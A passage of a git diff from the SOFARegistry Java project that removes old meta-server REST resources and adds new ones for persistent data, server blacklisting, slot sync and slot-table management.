javax.ws.rs.GET; -import javax.ws.rs.POST; -import javax.ws.rs.Path; -import javax.ws.rs.Produces; -import javax.ws.rs.core.MediaType; -import java.util.HashMap; -import java.util.List; -import java.util.Map; -import java.util.stream.Collectors; - -/** - * - * @author shangyu.wh - * @version $Id: MetaStoreResource.java, v 0.1 2018-07-30 18:55 shangyu.wh Exp $ - */ -@Path("manage") -public class MetaStoreResource { - - private static final Logger LOGGER = LoggerFactory.getLogger(MetaStoreResource.class); - - @Autowired - private Registry metaServerRegistry; - - @Autowired - private NodeConfig nodeConfig; - - @Autowired - private RaftExchanger raftExchanger; - - /** - * set node list in raft - */ - @POST - @Path("changePeer") - @Produces(MediaType.APPLICATION_JSON) - public Result changePeer(@FormParam("ipAddressList") String ipAddressList) { - Result result = new Result(); - result.setSuccess(false); - - List ipAddressList0 = null; - if (StringUtils.isNotBlank(ipAddressList)) { - String[] ipAddressArr = StringUtils.split(StringUtils.trim(ipAddressList), ','); - if (ipAddressArr != null) { - ipAddressList0 = Lists.newArrayList(ipAddressArr); - } - } - if (ipAddressList0 == null || ipAddressList0.size() <= 0) { - String msg = String.format("Empty ipAddressList from input: %s", ipAddressList); - LOGGER.error(msg); - result.setMessage(msg); - return result; - } - - //domain -> ip - ipAddressList0 = ipAddressList0.stream().map(NetUtil::getIPAddressFromDomain).collect(Collectors.toList()); - - try { - raftExchanger.changePeer(ipAddressList0); - - //sleep for a while after changePeer: if leader changed, 'metaServerRegistry.setNodes(metaNodes);' will throw error: - // java.lang.IllegalStateException: Server error:is not leader - // at com.alipay.sofa.registry.jraft.bootstrap.RaftClient.sendRequest(RaftClient.java:192) - Thread.sleep(3000L); - - List metaNodes = Lists.newArrayList(); - for (String ipAddress : ipAddressList0) { - MetaNode metaNode = new MetaNode(new URL(ipAddress, 0), nodeConfig.getLocalDataCenter()); - metaNodes.add(metaNode); - } - - metaServerRegistry.setNodes(metaNodes); - - result.setSuccess(true); - - LOGGER.info("Change peer ipAddressList {} to store!", ipAddressList0); - } catch (Exception e) { - String msg = String.format("Error when changePeer: %s", e.getMessage()); - result.setMessage(msg); - LOGGER.error(msg, e); - } - return result; - } - - /** - * force set node list in raft (no need leader alive), maybe lost data - */ - @POST - @Path("resetPeer") - @Produces(MediaType.APPLICATION_JSON) - public Result resetPeer(@FormParam("ipAddressList") String ipAddressList) { - Result result = new Result(); - result.setSuccess(false); - - List ipAddressList0 = null; - if (StringUtils.isNotBlank(ipAddressList)) { - String[] ipAddressArr = StringUtils.split(StringUtils.trim(ipAddressList), ','); - if (ipAddressArr != null) { - ipAddressList0 = Lists.newArrayList(ipAddressArr); - } - } - if (ipAddressList0 == null || ipAddressList0.size() <= 0) { - String msg = String.format("Empty ipAddressList from input: %s", ipAddressList); - LOGGER.error(msg); - result.setMessage(msg); - return result; - } - - //domain -> ip - ipAddressList0 = ipAddressList0.stream().map(NetUtil::getIPAddressFromDomain).collect(Collectors.toList()); - - try { - raftExchanger.resetPeer(ipAddressList0); - - List metaNodes = Lists.newArrayList(); - for (String ipAddress : ipAddressList0) { - MetaNode metaNode = new MetaNode(new URL(ipAddress, 0), nodeConfig.getLocalDataCenter()); - metaNodes.add(metaNode); - } - metaServerRegistry.setNodes(metaNodes); - - result.setSuccess(true); - - LOGGER.info("Reset peer ipAddressList {} to store!", ipAddressList0); - } catch (Exception e) { - String msg = String.format("Error when resetPeer: %s", e.getMessage()); - result.setMessage(msg); - LOGGER.error(msg, e); - } - return result; - } - - @POST - @Path("removePeer") - @Produces(MediaType.APPLICATION_JSON) - public Result remove(Map map) { - - Result result = new Result(); - if (map != null && !map.isEmpty()) { - - Map throwables = new HashMap<>(); - map.forEach((ipAddress, dataCenter) -> { - try { - if (!nodeConfig.getLocalDataCenter().equals(dataCenter)) { - LOGGER.error("Error input dataCenter {} ,current dataCenter {}!", dataCenter, - nodeConfig.getLocalDataCenter()); - throwables.put(ipAddress, "Error input dataCenter"); - return; - } - - //domain -> ip - ipAddress = NetUtil.getIPAddressFromDomain(ipAddress); - - raftExchanger.removePeer(ipAddress); - metaServerRegistry.cancel(ipAddress, NodeType.META); - LOGGER.info("Remove peer ipAddress {} to store!", ipAddress); - } catch (Exception e) { - LOGGER.error("Error remove peer ipAddress {} to store!", ipAddress, e); - throwables.put(ipAddress, e.getMessage()); - } - }); - - if (throwables.isEmpty()) { - result.setSuccess(true); - } else { - result.setSuccess(false); - result.setMessage(String.format("Nod remove all peer node,there are %s exception!", throwables.size())); - } - } else { - result.setSuccess(false); - result.setMessage("Input node map is empty!"); - } - return result; - } - - @GET - @Path("queryPeer") - @Produces(MediaType.APPLICATION_JSON) - public List getMetaList() { - List peerIds = raftExchanger.getPeers(); - return peerIds.stream().map(PeerId::getIp).collect(Collectors.toList()); - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/PersistentDataResource.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/PersistentDataResource.java deleted file mode 100644 index 84b56fd5b..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/PersistentDataResource.java +++ /dev/null @@ -1,134 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.resource; - -import com.alipay.sofa.registry.common.model.console.PersistenceData; -import com.alipay.sofa.registry.common.model.metaserver.DataOperator; -import com.alipay.sofa.registry.common.model.metaserver.NotifyProvideDataChange; -import com.alipay.sofa.registry.common.model.store.DataInfo; -import com.alipay.sofa.registry.core.model.Result; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.store.api.DBService; -import com.alipay.sofa.registry.store.api.annotation.RaftReference; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.beans.factory.annotation.Autowired; - -import javax.ws.rs.POST; -import javax.ws.rs.Path; -import javax.ws.rs.Produces; -import javax.ws.rs.core.MediaType; - -/** - * - * @author shangyu.wh - * @version $Id: DecisionModeResource.java, v 0.1 2018-02-01 16:50 shangyu.wh Exp $ - */ -@Path("persistentData") -public class PersistentDataResource { - - private static final Logger DB_LOGGER = LoggerFactory.getLogger(PersistentDataResource.class, - "[DBService]"); - - private static final Logger taskLogger = LoggerFactory.getLogger(PersistentDataResource.class, - "[Task]"); - - @RaftReference - private DBService persistenceDataDBService; - - @Autowired - private TaskListenerManager taskListenerManager; - - @POST - @Path("put") - @Produces(MediaType.APPLICATION_JSON) - public Result put(PersistenceData data) { - - checkObj(data, "PersistenceData"); - checkString(data.getData()); - checkObj(data.getVersion(), "version"); - - String dataInfoId = DataInfo.toDataInfoId(data.getDataId(), data.getInstanceId(), - data.getGroup()); - - try { - boolean ret = persistenceDataDBService.put(dataInfoId, data); - DB_LOGGER.info("put Persistence Data {} to DB result {}!", data, ret); - } catch (Exception e) { - DB_LOGGER.error("error put Persistence Data {} to DB!", data); - throw new RuntimeException("Put Persistence Data " + data + " to DB error!"); - } - - fireDataChangeNotify(data.getVersion(), dataInfoId, DataOperator.ADD); - - Result result = new Result(); - result.setSuccess(true); - return result; - } - - @POST - @Path("remove") - @Produces(MediaType.APPLICATION_JSON) - public Result remove(PersistenceData data) { - - checkObj(data, "PersistenceData"); - checkObj(data.getVersion(), "version"); - - String dataInfoId = DataInfo.toDataInfoId(data.getDataId(), data.getInstanceId(), - data.getGroup()); - - try { - boolean ret = persistenceDataDBService.remove(dataInfoId); - DB_LOGGER.info("remove Persistence Data {} from DB result {}!", data, ret); - } catch (Exception e) { - DB_LOGGER.error("error remove Persistence Data {} from DB!", data); - throw new RuntimeException("Remove Persistence Data " + data + " from DB error!"); - } - - fireDataChangeNotify(data.getVersion(), dataInfoId, DataOperator.REMOVE); - - Result result = new Result(); - result.setSuccess(true); - return result; - } - - private void fireDataChangeNotify(Long version, String dataInfoId, DataOperator dataOperator) { - - NotifyProvideDataChange notifyProvideDataChange = new NotifyProvideDataChange(dataInfoId, - version, dataOperator); - - TaskEvent taskEvent = new TaskEvent(notifyProvideDataChange, - TaskType.PERSISTENCE_DATA_CHANGE_NOTIFY_TASK); - taskLogger.info("send PERSISTENCE_DATA_CHANGE_NOTIFY_TASK notifyProvideDataChange:" - + notifyProvideDataChange); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private void checkString(String input) { - if (input == null || input.isEmpty()) { - throw new IllegalArgumentException("Error String data input:" + input); - } - } - - private void checkObj(Object input, String objName) { - if (input == null) { - throw new IllegalArgumentException("Error null Object " + objName + " data input!"); - } - } -} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/ProvideDataResource.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/ProvideDataResource.java new file mode 100644 index 000000000..b5f4c3d0b --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/ProvideDataResource.java @@ -0,0 +1,148 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.core.model.Result; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.provide.data.DefaultProvideDataNotifier; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import com.alipay.sofa.registry.server.meta.resource.filter.LeaderAwareRestController; +import com.google.common.annotations.VisibleForTesting; +import javax.ws.rs.POST; +import javax.ws.rs.Path; +import javax.ws.rs.Produces; +import javax.ws.rs.core.MediaType; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author shangyu.wh + * @version $Id: DecisionModeResource.java, v 0.1 2018-02-01 16:50 shangyu.wh Exp $ + */ +@Path("persistentData") +@LeaderAwareRestController +public class ProvideDataResource { + + private static final Logger DB_LOGGER = + LoggerFactory.getLogger(ProvideDataResource.class, "[DBService]"); + + private static final Logger taskLogger = + LoggerFactory.getLogger(ProvideDataResource.class, "[Task]"); + + @Autowired private ProvideDataService provideDataService; + + @Autowired private DefaultProvideDataNotifier provideDataNotifier; + + @POST + @Path("put") + @Produces(MediaType.APPLICATION_JSON) + public Result put(PersistenceData data) { + + checkObj(data, "PersistenceData"); + checkString(data.getData()); + checkObj(data.getVersion(), "version"); + + String dataInfoId = + DataInfo.toDataInfoId(data.getDataId(), data.getInstanceId(), data.getGroup()); + + boolean ret; + try { + ret = provideDataService.saveProvideData(data); + DB_LOGGER.info("put Persistence Data {} to DB result {}!", data, ret); + } catch (Throwable e) { + DB_LOGGER.error("error put Persistence Data {} to DB!", data, e); + throw new RuntimeException("Put Persistence Data " + data + " to DB error!", e); + } + + if (ret) { + fireDataChangeNotify(data.getVersion(), dataInfoId); + } + + Result result = new Result(); + result.setSuccess(ret); + return result; + } + + @POST + @Path("remove") + @Produces(MediaType.APPLICATION_JSON) + public Result remove(PersistenceData data) { + + checkObj(data, "PersistenceData"); + checkObj(data.getVersion(), "version"); + + String dataInfoId = + DataInfo.toDataInfoId(data.getDataId(), data.getInstanceId(), data.getGroup()); + + boolean ret; + try { + ret = provideDataService.removeProvideData(dataInfoId); + DB_LOGGER.info("remove Persistence Data {} from DB result {}!", data, ret); + } catch (Exception e) { + DB_LOGGER.error("error remove Persistence Data {} from DB!", data); + throw new RuntimeException("Remove Persistence Data " + data + " from DB error!"); + } + + if (ret) { + fireDataChangeNotify(data.getVersion(), dataInfoId); + } + + Result result = new Result(); + result.setSuccess(ret); + return result; + } + + private void fireDataChangeNotify(Long version, String dataInfoId) { + + ProvideDataChangeEvent provideDataChangeEvent = new ProvideDataChangeEvent(dataInfoId, version); + + if (taskLogger.isInfoEnabled()) { + taskLogger.info( + "send PERSISTENCE_DATA_CHANGE_NOTIFY_TASK notifyProvideDataChange: {}", + provideDataChangeEvent); + } + provideDataNotifier.notifyProvideDataChange(provideDataChangeEvent); + } + + private void checkString(String input) { + if (input == null || input.isEmpty()) { + throw new IllegalArgumentException("Error String data input:" + input); + } + } + + private void checkObj(Object input, String objName) { + if (input == null) { + throw new IllegalArgumentException("Error null Object " + objName + " data input!"); + } + } + + @VisibleForTesting + protected ProvideDataResource setProvideDataService(ProvideDataService provideDataService) { + this.provideDataService = provideDataService; + return this; + } + + @VisibleForTesting + protected ProvideDataResource setProvideDataNotifier( + DefaultProvideDataNotifier provideDataNotifier) { + this.provideDataNotifier = provideDataNotifier; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/RegistryCoreOpsResource.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/RegistryCoreOpsResource.java new file mode 100644 index 000000000..74340a542 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/RegistryCoreOpsResource.java @@ -0,0 +1,105 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.lease.filter.RegistryForbiddenServerManager; +import com.alipay.sofa.registry.server.meta.resource.filter.LeaderAwareRestController; +import com.google.common.annotations.VisibleForTesting; +import javax.ws.rs.PUT; +import javax.ws.rs.Path; +import javax.ws.rs.PathParam; +import javax.ws.rs.Produces; +import javax.ws.rs.core.MediaType; +import org.apache.commons.lang.StringUtils; +import org.springframework.beans.factory.annotation.Autowired; +import sun.net.util.IPAddressUtil; + +/** + * @author chen.zhu + *

Mar 24, 2021 + */ +@Path("opsapi/v1") +public class RegistryCoreOpsResource { + + private final Logger LOGGER = LoggerFactory.getLogger(RegistryCoreOpsResource.class); + + @Autowired private RegistryForbiddenServerManager registryForbiddenServerManager; + + @PUT + @Path("/server/group/quit/{ip}") + @Produces(MediaType.APPLICATION_JSON) + @LeaderAwareRestController + public CommonResponse kickoffServer(@PathParam(value = "ip") String ip) { + LOGGER.info("[kickoffServer][begin] server [{}]", ip); + if (StringUtils.isBlank(ip) || !IPAddressUtil.isIPv4LiteralAddress(ip)) { + LOGGER.error("[kickoffServer]invalid ip: {}", ip); + return GenericResponse.buildFailedResponse("invalid ip address: " + ip); + } + try { + boolean success = registryForbiddenServerManager.addToBlacklist(ip); + + if (!success) { + LOGGER.error("[kickoffServer] add ip: {} to blacklist fail.", ip); + } + return success + ? GenericResponse.buildSuccessResponse() + : GenericResponse.buildFailedResponse("kickoffServer: " + ip + " fail."); + } catch (Throwable th) { + LOGGER.error("[kickoffServer]", th); + return GenericResponse.buildFailedResponse(th.getMessage()); + } finally { + LOGGER.info("[kickoffServer][end] server [{}]", ip); + } + } + + @PUT + @Path("/server/group/join/{ip}") + @Produces(MediaType.APPLICATION_JSON) + @LeaderAwareRestController + public CommonResponse rejoinServerGroup(@PathParam(value = "ip") String ip) { + LOGGER.info("[rejoinServerGroup][begin] server [{}]", ip); + if (StringUtils.isBlank(ip) || !IPAddressUtil.isIPv4LiteralAddress(ip)) { + LOGGER.error("[rejoinServerGroup]invalid ip: {}", ip); + return GenericResponse.buildFailedResponse("invalid ip address: " + ip); + } + try { + boolean success = registryForbiddenServerManager.removeFromBlacklist(ip); + if (!success) { + LOGGER.error("[rejoinServerGroup] remove ip: {} to blacklist fail.", ip); + } + return success + ? GenericResponse.buildSuccessResponse() + : GenericResponse.buildFailedResponse("rejoinServerGroup: " + ip + " fail."); + } catch (Throwable th) { + LOGGER.error("[rejoinServerGroup]", th); + return GenericResponse.buildFailedResponse(th.getMessage()); + } finally { + LOGGER.info("[rejoinServerGroup][end] server [{}]", ip); + } + } + + @VisibleForTesting + protected RegistryCoreOpsResource setRegistryForbiddenServerManager( + RegistryForbiddenServerManager registryForbiddenServerManager) { + this.registryForbiddenServerManager = registryForbiddenServerManager; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/SlotSyncResource.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/SlotSyncResource.java new file mode 100644 index 000000000..2bbec20e7 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/SlotSyncResource.java @@ -0,0 +1,71 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import com.alipay.sofa.registry.server.meta.resource.filter.LeaderAwareRestController; +import com.alipay.sofa.registry.store.api.DBResponse; +import com.google.common.annotations.VisibleForTesting; +import java.util.HashMap; +import java.util.Map; +import javax.ws.rs.GET; +import javax.ws.rs.Path; +import javax.ws.rs.Produces; +import javax.ws.rs.core.MediaType; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author shangyu.wh + * @version $Id: RenewSwitchResource.java, v 0.1 2018-07-25 11:40 shangyu.wh Exp $ + */ +@Path("slotSync") +@LeaderAwareRestController +public class SlotSyncResource { + + @Autowired private ProvideDataService provideDataService; + + /** get */ + @GET + @Path("get") + @Produces(MediaType.APPLICATION_JSON) + public Map getSlotSync() throws Exception { + Map resultMap = new HashMap<>(2); + DBResponse syncSessionIntervalSec = + provideDataService.queryProvideData(ValueConstants.DATA_DATUM_SYNC_SESSION_INTERVAL_SEC); + DBResponse dataDatumExpire = + provideDataService.queryProvideData(ValueConstants.DATA_SESSION_LEASE_SEC); + + resultMap.put("syncSessionIntervalSec", getEntityData(syncSessionIntervalSec)); + resultMap.put("dataDatumExpire", getEntityData(dataDatumExpire)); + return resultMap; + } + + private static String getEntityData(DBResponse resp) { + if (resp != null && resp.getEntity() != null) { + return resp.getEntity().getData(); + } + return "null"; + } + + @VisibleForTesting + protected SlotSyncResource setProvideDataService(ProvideDataService provideDataService) { + this.provideDataService = provideDataService; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/SlotTableResource.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/SlotTableResource.java new file mode 100644 index 000000000..fdfe1a21e --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/SlotTableResource.java @@ -0,0 +1,278 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.monitor.SlotTableMonitor; +import com.alipay.sofa.registry.server.meta.resource.filter.LeaderAwareRestController; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.alipay.sofa.registry.server.meta.slot.arrange.ScheduledSlotArranger; +import com.alipay.sofa.registry.server.meta.slot.balance.BalancePolicy; +import com.alipay.sofa.registry.server.meta.slot.balance.NaiveBalancePolicy; +import com.alipay.sofa.registry.server.meta.slot.tasks.BalanceTask; +import com.alipay.sofa.registry.server.shared.slot.SlotTableUtils; +import com.alipay.sofa.registry.util.MathUtils; +import java.util.List; +import java.util.Map; +import javax.ws.rs.GET; +import javax.ws.rs.PUT; +import javax.ws.rs.Path; +import javax.ws.rs.Produces; +import javax.ws.rs.core.MediaType; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author chen.zhu + *

Jan 08, 2021 + */ +@Path("openapi/v1/slot/table") +public class SlotTableResource { + + private final Logger logger = LoggerFactory.getLogger(getClass()); + + @Autowired private SlotManager slotManager; + + @Autowired private SlotTableMonitor slotTableMonitor; + + @Autowired private DataServerManager dataServerManager; + + @Autowired private ScheduledSlotArranger slotArranger; + + @Autowired private MetaLeaderService metaLeaderService; + + @PUT + @Path("force/refresh") + @Produces(MediaType.APPLICATION_JSON) + @LeaderAwareRestController + public GenericResponse forceRefreshSlotTable() { + logger.info("[forceRefreshSlotTable] begin"); + if (metaLeaderService.amILeader()) { + if (slotArranger.tryLock()) { + try { + BalanceTask task = + new BalanceTask( + slotManager, dataServerManager.getDataServerMetaInfo().getClusterMembers()); + task.run(); + logger.info("[forceRefreshSlotTable] end with succeed"); + return new GenericResponse().fillSucceed(slotManager.getSlotTable()); + } finally { + slotArranger.unlock(); + } + } else { + logger.info("[forceRefreshSlotTable] end, fail to get the lock"); + return new GenericResponse().fillFailed("scheduled slot arrangement is running"); + } + } else { + logger.info("[forceRefreshSlotTable] end, not meta-server leader"); + return new GenericResponse().fillFailed("not the meta-server leader"); + } + } + + @PUT + @Path("/reconcile/stop") + @Produces(MediaType.APPLICATION_JSON) + public CommonResponse stopSlotTableReconcile() { + logger.info("[stopSlotTableReconcile] begin"); + try { + slotArranger.suspend(); + logger.info("[stopSlotTableReconcile] end with succeed"); + return GenericResponse.buildSuccessResponse("succeed"); + } catch (Throwable throwable) { + logger.error("[stopSlotTableReconcile] end", throwable); + return GenericResponse.buildFailedResponse(throwable.getMessage()); + } + } + + @PUT + @Path("/reconcile/start") + @Produces(MediaType.APPLICATION_JSON) + public CommonResponse startSlotTableReconcile() { + logger.info("[startSlotTableReconcile] begin"); + try { + slotArranger.resume(); + logger.info("[startSlotTableReconcile] end with succeed"); + return GenericResponse.buildSuccessResponse("succeed"); + } catch (Throwable throwable) { + logger.error("[startSlotTableReconcile] end", throwable); + return GenericResponse.buildFailedResponse(throwable.getMessage()); + } + } + + @GET + @Path("/reconcile/status") + @Produces(MediaType.APPLICATION_JSON) + @LeaderAwareRestController + public CommonResponse getReconcileStatus() { + logger.info("[getReconcileStatus] begin"); + try { + boolean result = slotArranger.getLifecycleState().isStarted() && !slotArranger.isSuspended(); + logger.info("[getReconcileStatus] end with succeed"); + if (result) { + return GenericResponse.buildSuccessResponse("running"); + } else { + return GenericResponse.buildSuccessResponse("stopped"); + } + } catch (Throwable throwable) { + logger.error("[getReconcileStatus] end", throwable); + return GenericResponse.buildFailedResponse(throwable.getMessage()); + } + } + + @GET + @Path("/data/slot/status") + @Produces(MediaType.APPLICATION_JSON) + @LeaderAwareRestController + public GenericResponse getDataSlotStatuses() { + logger.info("[getDataSlotStatuses] begin"); + try { + return new GenericResponse<>().fillSucceed(dataServerManager.getDataServersStats()); + } catch (Throwable throwable) { + return new GenericResponse<>().fillFailed(throwable.getMessage()); + } finally { + logger.info("[getDataSlotStatuses] end"); + } + } + + @GET + @Path("/status") + @Produces(MediaType.APPLICATION_JSON) + @LeaderAwareRestController + public GenericResponse getSlotTableStatus() { + logger.info("[getSlotTableStatus] begin"); + try { + boolean isSlotStable = slotTableMonitor.isStableTableStable(); + SlotTable slotTable = slotManager.getSlotTable(); + Map leaderCounter = SlotTableUtils.getSlotTableLeaderCount(slotTable); + Map followerCounter = SlotTableUtils.getSlotTableSlotCount(slotTable); + boolean isSlotBalanced = + isSlotTableBalanced( + leaderCounter, + followerCounter, + dataServerManager.getDataServerMetaInfo().getClusterMembers()); + return new GenericResponse<>() + .fillSucceed( + new SlotTableStatusResponse( + slotTable.getEpoch(), + isSlotBalanced, + isSlotStable, + leaderCounter, + followerCounter)); + } catch (Throwable th) { + logger.error("[getSlotTableStatus]", th); + return new GenericResponse<>().fillFailed(th.getMessage()); + } finally { + logger.info("[getSlotTableStatus] end"); + } + } + + public boolean isSlotTableBalanced( + Map leaderCounter, + Map followerCounter, + List dataNodes) { + + BalancePolicy balancePolicy = new NaiveBalancePolicy(); + int leaderTotal = slotManager.getSlotNums(); + int leaderAverage = MathUtils.divideCeil(leaderTotal, dataNodes.size()); + int leaderHighWaterMark = balancePolicy.getHighWaterMarkSlotLeaderNums(leaderAverage); + int leaderLowWaterMark = balancePolicy.getLowWaterMarkSlotLeaderNums(leaderAverage); + + int followerTotal = slotManager.getSlotNums() * (slotManager.getSlotReplicaNums() - 1); + int followerAverage = MathUtils.divideCeil(followerTotal, dataNodes.size()); + int followerHighWaterMark = balancePolicy.getHighWaterMarkSlotFollowerNums(followerAverage); + int followerLowWaterMark = balancePolicy.getLowWaterMarkSlotFollowerNums(followerAverage); + + for (DataNode dataNode : dataNodes) { + String dataIp = dataNode.getIp(); + if (leaderCounter.get(dataIp) == null) { + return false; + } + int leaderCount = leaderCounter.getOrDefault(dataIp, 0); + if (leaderCount > leaderHighWaterMark || leaderCount < leaderLowWaterMark) { + return false; + } + int followerCount = followerCounter.getOrDefault(dataIp, 0); + if (followerCount > followerHighWaterMark || followerCount < followerLowWaterMark) { + return false; + } + } + return true; + } + + public static class SlotTableStatusResponse { + + private final long slotTableEpoch; + + private final boolean isSlotTableBalanced; + + private final boolean isSlotTableStable; + + private final Map leaderCount; + + private final Map followerCount; + + public SlotTableStatusResponse( + long slotTableEpoch, + boolean slotTableBalanced, + boolean slotTableStable, + Map leaderCount, + Map followerCount) { + this.slotTableEpoch = slotTableEpoch; + this.isSlotTableBalanced = slotTableBalanced; + this.isSlotTableStable = slotTableStable; + this.leaderCount = leaderCount; + this.followerCount = followerCount; + } + + public boolean isSlotTableBalanced() { + return isSlotTableBalanced; + } + + public boolean isSlotTableStable() { + return isSlotTableStable; + } + + public Map getLeaderCount() { + return leaderCount; + } + + public Map getFollowerCount() { + return followerCount; + } + } + + public SlotTableResource() {} + + public SlotTableResource( + SlotManager slotManager, + SlotTableMonitor slotTableMonitor, + DataServerManager dataServerManager, + ScheduledSlotArranger slotArranger, + MetaLeaderService metaLeaderService) { + this.slotManager = slotManager; + this.slotTableMonitor = slotTableMonitor; + this.dataServerManager = dataServerManager; + this.slotArranger = slotArranger; + this.metaLeaderService = metaLeaderService; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/StopPushDataResource.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/StopPushDataResource.java index 40df5eec1..690fea60d 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/StopPushDataResource.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/StopPushDataResource.java @@ -16,119 +16,127 @@ */ package com.alipay.sofa.registry.server.meta.resource; +import com.alipay.sofa.registry.common.model.Node.NodeType; import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.console.PersistenceDataBuilder; import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import com.alipay.sofa.registry.common.model.metaserver.DataOperator; -import com.alipay.sofa.registry.common.model.metaserver.NotifyProvideDataChange; -import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; import com.alipay.sofa.registry.core.model.Result; import com.alipay.sofa.registry.log.Logger; import 